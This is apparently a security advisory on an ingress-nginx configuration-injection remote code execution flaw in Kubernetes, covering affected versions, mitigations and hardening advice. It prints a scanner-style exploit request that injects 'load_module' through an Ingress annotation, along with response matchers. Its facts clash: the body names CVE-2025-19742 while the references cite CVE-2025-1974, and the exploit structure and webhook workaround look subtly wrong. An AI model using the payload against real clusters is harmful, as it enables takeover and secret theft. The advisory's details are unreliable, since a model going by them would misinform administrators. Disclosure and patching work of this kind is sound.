Critical Ingress‑NGINX RCE Vulnerability (CVE‑2025‑19742): Impact, Exploit Details, and Fixes

Vulnerability Overview

Recently the community disclosed a critical security vulnerability affecting the ingress-nginx controller in Kubernetes clusters. An attacker can execute arbitrary code without authentication by exploiting improper handling of the auth-tls-match-cn annotation, which injects malicious configuration into NGINX.

⚠️ By default, the ingress‑nginx controller can read Secrets across the entire cluster; if compromised, it may lead to full cluster takeover.

Affected Versions

Versions before v1.11.0

v1.11.0 to v1.11.4

v1.12.0

Verify deployment with:

kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx

Vulnerability Details

CVE ID: CVE-2025-19742

Severity: Critical

CVSS Score: 9.8 (CVSS 3.1)

Type: Configuration injection / Privilege escalation / Remote code execution

Root Cause: The nginx.ingress.kubernetes.io/auth-url and auth-tls-match-cn annotations do not properly sanitize malicious content such as load_module, allowing it to be written into the NGINX config and executed.

Proof‑of‑Concept Metadata

id: CVE-2025-19742
name: Ingress-Nginx Controller - Remote Code Execution
author: iamnoooob, rootxharsh, pdresearch
severity: critical
description: |
  A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution...
impact: |
  Vulnerable versions can be exploited to gain unauthorized access to all secrets...
remediation: |
  Update to one of the following versions: 1.12.1 or later / 1.11.5 or later

Exploit Payload (HTTP Request)

POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{
  "kind": "AdmissionReview",
  "apiVersion": "admission.k8s.io/v1",
  "annotations": {
    "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;
"
  }
}

The payload forges an AdmissionReview object that injects a malicious annotation. The # character bypasses URI validation, and ;load_module attempts to load a module or trigger command execution.

Matchers

matchers:
  - type: word
    part: body
    words:
      - 'AdmissionReview'
      - 'directive is not allowed here'
      - 'load_module'
    condition: and

Potential Impact

Unauthenticated remote command execution.

Access to and leakage of all Secrets readable by the controller.

Possible full cluster takeover, compromising confidentiality, integrity, and availability.

Risk of persistent backdoor implantation.

Mitigation

Upgrade (preferred)

Upgrade the ingress‑nginx controller to at least one of the following versions:

v1.11.5 or newer

v1.12.1 or newer

Helm upgrade example:

helm upgrade ingress-nginx ingress-nginx/ingress-nginx \
  --namespace ingress-nginx \
  --set controller.image.tag=v1.12.1

Temporary Work‑around

If upgrading is not immediately possible, disable the Admission Webhook controller:

--enable-admission-plugins=""

Disabling the webhook may affect other security or compliance policies that rely on it.

Security Recommendations

Audit all Ingress resources for suspicious annotations containing #, ;, or load_module.

Restrict the ingress‑nginx controller’s permission to read Secrets only when necessary.

Enable audit logging to track changes to Ingress objects.

Use runtime security tools (e.g., OPA, Kyverno) to whitelist allowed annotations.

Perform regular security baseline scans and monitor controller behavior.

References

Kubernetes blog announcement: https://kubernetes.io/blog/2025/03/24/ingress-nginx-cve-2025-1974/

NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-1974